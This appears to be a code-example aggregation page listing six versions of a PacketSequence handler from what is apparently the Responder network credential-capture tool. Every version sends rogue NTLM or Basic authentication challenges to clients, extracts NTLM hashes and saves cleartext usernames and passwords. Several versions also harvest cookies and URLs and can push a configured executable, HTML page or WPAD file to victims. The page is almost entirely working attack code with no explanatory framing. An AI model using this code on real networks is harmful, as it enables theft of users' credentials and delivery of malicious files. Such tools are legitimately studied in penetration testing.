Esempio n. 1
0
def PacketSequence(data, client, Challenge):
	NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
	NTLM_Auth2 = re.findall(r'(?<=Authorization: Negotiate )[^\r]*', data)
	Basic_Auth = re.findall(r'(?<=Authorization: Basic )[^\r]*', data)

	if NTLM_Auth or NTLM_Auth2:
		if NTLM_Auth2:
			Packet_NTLM = b64decode(''.join(NTLM_Auth2))[8:9]
		if NTLM_Auth:
			Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]

		if Packet_NTLM == b'\x01':
			Buffer = NTLM_Challenge(NegoFlags="\x35\x82\x89\xe2", ServerChallenge=NetworkRecvBufferPython2or3(Challenge))
			Buffer.calculate()
			if NTLM_Auth2:
				Buffer_Ans = WinRM_NTLM_Challenge_Ans(Payload = b64encode(NetworkSendBufferPython2or3(Buffer)).decode('latin-1'))
				return Buffer_Ans
			else:
				Buffer_Ans = IIS_NTLM_Challenge_Ans(Payload = b64encode(NetworkSendBufferPython2or3(Buffer)).decode('latin-1'))
				return Buffer_Ans

		if Packet_NTLM == b'\x03':
			if NTLM_Auth2:
				NTLM_Auth = b64decode(''.join(NTLM_Auth2))
			else:
				NTLM_Auth = b64decode(''.join(NTLM_Auth))

			ParseHTTPHash(NTLM_Auth, Challenge, client, "WinRM")
			Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
			Buffer.calculate()
			return Buffer

	elif Basic_Auth:
		ClearText_Auth = b64decode(''.join(Basic_Auth))

		SaveToDb({
			'module': 'WinRM', 
			'type': 'Basic', 
			'client': client, 
			'user': ClearText_Auth.decode('latin-1').split(':')[0], 
			'cleartext': ClearText_Auth.decode('latin-1').split(':')[1], 
			})

		Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
		Buffer.calculate()
		return Buffer
	else:
		if settings.Config.Basic:
			Response = IIS_Basic_401_Ans()
			if settings.Config.Verbose:
				print(text("[WinRM] Sending BASIC authentication request to %s" % client))

		else:
			Response = IIS_Auth_401_Ans()
			if settings.Config.Verbose:
				print(text("[WinRM] Sending NTLM authentication request to %s" % client))

		return Response
Esempio n. 2
0
def PacketSequence(data, client):
    NTLM_Auth = re.findall('(?<=Authorization: NTLM )[^\\r]*', data)
    Basic_Auth = re.findall('(?<=Authorization: Basic )[^\\r]*', data)

    # Serve the .exe if needed
    if settings.Config.Serve_Always == True or (
            settings.Config.Serve_Exe == True and re.findall('.exe', data)):
        return RespondWithFile(client, settings.Config.Exe_Filename,
                               settings.Config.Exe_DlName)

    # Serve the custom HTML if needed
    if settings.Config.Serve_Html:
        return RespondWithFile(client, settings.Config.Html_Filename)

    WPAD_Custom = WpadCustom(data, client)

    if NTLM_Auth:
        Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]

        if Packet_NTLM == "\x01":
            GrabURL(data, client)
            GrabReferer(data, client)
            GrabHost(data, client)
            GrabCookie(data, client)

            Buffer = NTLM_Challenge(ServerChallenge=settings.Config.Challenge)
            Buffer.calculate()

            Buffer_Ans = IIS_NTLM_Challenge_Ans()
            Buffer_Ans.calculate(str(Buffer))

            return str(Buffer_Ans)

        if Packet_NTLM == "\x03":
            NTLM_Auth = b64decode(''.join(NTLM_Auth))
            ParseHTTPHash(NTLM_Auth, client)

            if settings.Config.Force_WPAD_Auth and WPAD_Custom:
                print text("[HTTP] WPAD (auth) file sent to %s" % client)
                return WPAD_Custom

            else:
                Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
                Buffer.calculate()
                return str(Buffer)

    elif Basic_Auth:
        ClearText_Auth = b64decode(''.join(Basic_Auth))

        GrabURL(data, client)
        GrabReferer(data, client)
        GrabHost(data, client)
        GrabCookie(data, client)

        SaveToDb({
            'module': 'HTTP',
            'type': 'Basic',
            'client': client,
            'user': ClearText_Auth.split(':')[0],
            'cleartext': ClearText_Auth.split(':')[1],
        })

        if settings.Config.Force_WPAD_Auth and WPAD_Custom:
            if settings.Config.Verbose:
                print text("[HTTP] WPAD (auth) file sent to %s" % client)
            return WPAD_Custom

        else:
            Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
            Buffer.calculate()
            return str(Buffer)

    else:
        if settings.Config.Basic:
            Response = IIS_Basic_401_Ans()
            if settings.Config.Verbose:
                print text(
                    "[HTTP] Sending BASIC authentication request to %s" %
                    client)

        else:
            Response = IIS_Auth_401_Ans()
            if settings.Config.Verbose:
                print text("[HTTP] Sending NTLM authentication request to %s" %
                           client)

        return str(Response)
Esempio n. 3
0
def PacketSequence(data, client):
	NTLM_Auth = re.findall('(?<=Authorization: NTLM )[^\\r]*', data)
	Basic_Auth = re.findall('(?<=Authorization: Basic )[^\\r]*', data)

	# Serve the .exe if needed
	if settings.Config.Serve_Always == True or (settings.Config.Serve_Exe == True and re.findall('.exe', data)):
		return RespondWithFile(client, settings.Config.Exe_Filename, settings.Config.Exe_DlName)

	# Serve the custom HTML if needed
	if settings.Config.Serve_Html == True:
		return RespondWithFile(client, settings.Config.Html_Filename)

	WPAD_Custom = WpadCustom(data, client)
	
	if NTLM_Auth:
		Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]

		if Packet_NTLM == "\x01":
			GrabURL(data, client)
			GrabHost(data, client)
			GrabCookie(data, client)

			Buffer = NTLM_Challenge(ServerChallenge=settings.Config.Challenge)
			Buffer.calculate()

			Buffer_Ans = IIS_NTLM_Challenge_Ans()
			Buffer_Ans.calculate(str(Buffer))

			return str(Buffer_Ans)

		if Packet_NTLM == "\x03":
			NTLM_Auth = b64decode(''.join(NTLM_Auth))
			ParseHTTPHash(NTLM_Auth, client)

			if settings.Config.Force_WPAD_Auth and WPAD_Custom:
				print text("[HTTP] WPAD (auth) file sent to %s" % client)
				return WPAD_Custom

			else:
				Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
				Buffer.calculate()
				return str(Buffer)

	elif Basic_Auth:
		ClearText_Auth = b64decode(''.join(Basic_Auth))

		GrabURL(data, client)
		GrabHost(data, client)
		GrabCookie(data, client)

		SaveToDb({
			'module': 'HTTP', 
			'type': 'Basic', 
			'client': client, 
			'user': ClearText_Auth.split(':')[0], 
			'cleartext': ClearText_Auth.split(':')[1], 
		})

		if settings.Config.Force_WPAD_Auth and WPAD_Custom:
			if settings.Config.Verbose:
				print text("[HTTP] WPAD (auth) file sent to %s" % client)
			return WPAD_Custom

		else:
			Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
			Buffer.calculate()
			return str(Buffer)

	else:
		if settings.Config.Basic == True:
			Response = IIS_Basic_401_Ans()
			if settings.Config.Verbose:
				print text("[HTTP] Sending BASIC authentication request to %s" % client)

		else:
			Response = IIS_Auth_401_Ans()
			if settings.Config.Verbose:
				print text("[HTTP] Sending NTLM authentication request to %s" % client)

		return str(Response)
Esempio n. 4
0
def PacketSequence(data, client, Challenge):
    NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
    Basic_Auth = re.findall(r'(?<=Authorization: Basic )[^\r]*', data)

    # Serve the .exe if needed
    if settings.Config.Serve_Always is True or (
            settings.Config.Serve_Exe is True and re.findall('.exe', data)):
        return RespondWithFile(client, settings.Config.Exe_Filename,
                               settings.Config.Exe_DlName)

    # Serve the custom HTML if needed
    if settings.Config.Serve_Html:
        return RespondWithFile(client, settings.Config.Html_Filename)

    WPAD_Custom = WpadCustom(data, client)
    # Webdav
    if ServeOPTIONS(data):
        return ServeOPTIONS(data)

    if NTLM_Auth:
        Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
        if Packet_NTLM == b'\x01':
            GrabURL(data, client)
            GrabReferer(data, client)
            GrabHost(data, client)
            GrabCookie(data, client)

            Buffer = NTLM_Challenge(
                ServerChallenge=NetworkRecvBufferPython2or3(Challenge))
            Buffer.calculate()

            Buffer_Ans = IIS_NTLM_Challenge_Ans(Payload=b64encode(
                NetworkSendBufferPython2or3(Buffer)).decode('latin-1'))
            #Buffer_Ans.calculate(Buffer)
            return Buffer_Ans

        if Packet_NTLM == b'\x03':
            NTLM_Auth = b64decode(''.join(NTLM_Auth))
            if IsWebDAV(data):
                module = "WebDAV"
            else:
                module = "HTTP"
            ParseHTTPHash(NTLM_Auth, Challenge, client, module)

            if settings.Config.Force_WPAD_Auth and WPAD_Custom:
                print(text("[HTTP] WPAD (auth) file sent to %s" % client))

                return WPAD_Custom
            else:
                Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
                Buffer.calculate()
                return NetworkSendBufferPython2or3(Buffer)

    elif Basic_Auth:
        ClearText_Auth = b64decode(''.join(Basic_Auth))

        GrabURL(data, client)
        GrabReferer(data, client)
        GrabHost(data, client)
        GrabCookie(data, client)

        SaveToDb({
            'module': 'HTTP',
            'type': 'Basic',
            'client': client,
            'user': ClearText_Auth.decode('latin-1').split(':')[0],
            'cleartext': ClearText_Auth.decode('latin-1').split(':')[1],
        })

        if settings.Config.Force_WPAD_Auth and WPAD_Custom:
            if settings.Config.Verbose:
                print(text("[HTTP] WPAD (auth) file sent to %s" % client))

            return WPAD_Custom
        else:
            Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
            Buffer.calculate()
            return NetworkSendBufferPython2or3(Buffer)
    else:
        if settings.Config.Basic:
            Response = IIS_Basic_401_Ans()
            if settings.Config.Verbose:
                print(
                    text("[HTTP] Sending BASIC authentication request to %s" %
                         client))

        else:
            Response = IIS_Auth_401_Ans()
            if settings.Config.Verbose:
                print(
                    text("[HTTP] Sending NTLM authentication request to %s" %
                         client))

        return Response
Esempio n. 5
0
def PacketSequence(data, client):
    NTLM_Auth = re.findall(r"(?<=Authorization: NTLM )[^\r]*", data)
    Basic_Auth = re.findall(r"(?<=Authorization: Basic )[^\r]*", data)

    # Serve the .exe if needed
    if settings.Config.Serve_Always is True or (settings.Config.Serve_Exe is True and re.findall(".exe", data)):
        return RespondWithFile(client, settings.Config.Exe_Filename, settings.Config.Exe_DlName)

        # Serve the custom HTML if needed
    if settings.Config.Serve_Html:
        return RespondWithFile(client, settings.Config.Html_Filename)

    WPAD_Custom = WpadCustom(data, client)
    # Webdav
    if ServeOPTIONS(data):
        return ServeOPTIONS(data)

    if NTLM_Auth:
        Packet_NTLM = b64decode("".join(NTLM_Auth))[8:9]
        if Packet_NTLM == "\x01":
            GrabURL(data, client)
            GrabReferer(data, client)
            GrabHost(data, client)
            GrabCookie(data, client)

            Buffer = NTLM_Challenge(ServerChallenge=settings.Config.Challenge)
            Buffer.calculate()

            Buffer_Ans = IIS_NTLM_Challenge_Ans()
            Buffer_Ans.calculate(str(Buffer))
            return str(Buffer_Ans)

        if Packet_NTLM == "\x03":
            NTLM_Auth = b64decode("".join(NTLM_Auth))
            if IsWebDAV(data):
                module = "WebDAV"
            else:
                module = "HTTP"
            ParseHTTPHash(NTLM_Auth, client, module)

            if settings.Config.Force_WPAD_Auth and WPAD_Custom:
                print text("[HTTP] WPAD (auth) file sent to %s" % client)

                return WPAD_Custom
            else:
                Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
                Buffer.calculate()
                return str(Buffer)

    elif Basic_Auth:
        ClearText_Auth = b64decode("".join(Basic_Auth))

        GrabURL(data, client)
        GrabReferer(data, client)
        GrabHost(data, client)
        GrabCookie(data, client)

        SaveToDb(
            {
                "module": "HTTP",
                "type": "Basic",
                "client": client,
                "user": ClearText_Auth.split(":")[0],
                "cleartext": ClearText_Auth.split(":")[1],
            }
        )

        if settings.Config.Force_WPAD_Auth and WPAD_Custom:
            if settings.Config.Verbose:
                print text("[HTTP] WPAD (auth) file sent to %s" % client)

            return WPAD_Custom
        else:
            Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
            Buffer.calculate()
            return str(Buffer)
    else:
        if settings.Config.Basic:
            Response = IIS_Basic_401_Ans()
            if settings.Config.Verbose:
                print text("[HTTP] Sending BASIC authentication request to %s" % client)

        else:
            Response = IIS_Auth_401_Ans()
            if settings.Config.Verbose:
                print text("[HTTP] Sending NTLM authentication request to %s" % client)

        return str(Response)
Esempio n. 6
0
def PacketSequence(data, client, Challenge):
    NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
    Basic_Auth = re.findall(r'(?<=Authorization: Basic )[^\r]*', data)

    # simulate internet connectivity
    if settings.Config.Serve_Html_Simulate_Internet:
        # ToDo: Add more connectivity tests (iOS, OSX, Android)

        # Win7 check if "http://www.msftncsi.com/ncsi.txt" is requested
        if re.search(r'(/ncsi.txt HTTP)', data) and re.search(
                r'(www.msftncsi.com)', data):
            print text("[HTTP] Serving MSFTNCSI to %s" % client)
            Buffer = MSFTNCSI()
            # Buffer.calculate()
            return str(Buffer)
        # Win10 check if "http://www.msftconnecttest.com/connecttest.txt" is requested
        if re.search(r'(/connecttest.txt HTTP)', data) and re.search(
                r'(www.msftconnecttest.com)', data):
            print text("[HTTP] Serving MSFTCONNECTTEST to %s" % client)
            Buffer = MSFTCONNECTTEST()
            # Buffer.calculate()
            return str(Buffer)

    # Serve the .exe if needed
    if settings.Config.Serve_Always is True or (
            settings.Config.Serve_Exe is True and re.findall('.exe', data)):
        return RespondWithFile(client, settings.Config.Exe_Filename,
                               settings.Config.Exe_DlName)

    # ToDo: WPAD_Custom should only be set if 'WPADScript' is provided in config, but
    #	omitting 'WPADScript' isn't allowed and crashes Responder's ConfigParser
    WPAD_Custom = WpadCustom(data, client)

    # Serve the custom HTML file if needed, keep wpad.dat delivery if configured
    if settings.Config.Serve_Html:
        # if Serve_Html_Provide_WPAD_Anyway is enabled, but Force_WPAD_Auth disabled we provide customWPAD
        # if Serve_Html_Provide_WPAD_Anyway is enabled and Force_WPAD_Auth enabled we provide nothing
        # to pass execution to NTLM_auth/BASIC_auth
        if re.search(r'(/wpad.dat|/*\.pac)',
                     data) and settings.Config.Serve_Html_Provide_WPAD_Anyway:
            if not settings.Config.Force_WPAD_Auth:
                if WPAD_Custom:  # custom WPAD available (Note: not realy optional, see comment on WPAD_Custom)
                    return WPAD_Custom
                else:  # custom WPAD not available, provide HTML file (never reached, see comment on WPAD_Custom)
                    return RespondWithFile(client,
                                           settings.Config.Html_Filename)
            # else: 'Force_WPAD_Auth' set, pass execution to NTLM_auth/BASIC_auth (do nothing here)

        # Serve_Html_Provide_WPAD_Anyway is disabled or not a request to wpad.dat serve HTML file
        else:
            return RespondWithFile(client, settings.Config.Html_Filename)

# Webdav
    if ServeOPTIONS(data):
        return ServeOPTIONS(data)

    if NTLM_Auth:
        Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
        print "Challenge 2:", Challenge.encode('hex')
        if Packet_NTLM == "\x01":
            GrabURL(data, client)
            GrabReferer(data, client)
            GrabHost(data, client)
            GrabCookie(data, client)

            Buffer = NTLM_Challenge(ServerChallenge=Challenge)
            Buffer.calculate()

            Buffer_Ans = IIS_NTLM_Challenge_Ans()
            Buffer_Ans.calculate(str(Buffer))
            return str(Buffer_Ans)

        if Packet_NTLM == "\x03":
            NTLM_Auth = b64decode(''.join(NTLM_Auth))
            if IsWebDAV(data):
                module = "WebDAV"
            else:
                module = "HTTP"
            ParseHTTPHash(NTLM_Auth, Challenge, client, module)

            if settings.Config.Force_WPAD_Auth and WPAD_Custom:
                print text("[HTTP] WPAD (auth) file sent to %s" % client)

                return WPAD_Custom
            else:
                Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
                Buffer.calculate()
                return str(Buffer)

    elif Basic_Auth:
        ClearText_Auth = b64decode(''.join(Basic_Auth))

        GrabURL(data, client)
        GrabReferer(data, client)
        GrabHost(data, client)
        GrabCookie(data, client)

        SaveToDb({
            'module': 'HTTP',
            'type': 'Basic',
            'client': client,
            'user': ClearText_Auth.split(':')[0],
            'cleartext': ClearText_Auth.split(':')[1],
        })

        if settings.Config.Force_WPAD_Auth and WPAD_Custom:
            if settings.Config.Verbose:
                print text("[HTTP] WPAD (auth) file sent to %s" % client)

            return WPAD_Custom
        else:
            Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
            Buffer.calculate()
            return str(Buffer)
    else:
        if settings.Config.Basic:
            Response = IIS_Basic_401_Ans()
            if settings.Config.Verbose:
                print text(
                    "[HTTP] Sending BASIC authentication request to %s" %
                    client)

        else:
            Response = IIS_Auth_401_Ans()
            if settings.Config.Verbose:
                print text("[HTTP] Sending NTLM authentication request to %s" %
                           client)

        return str(Response)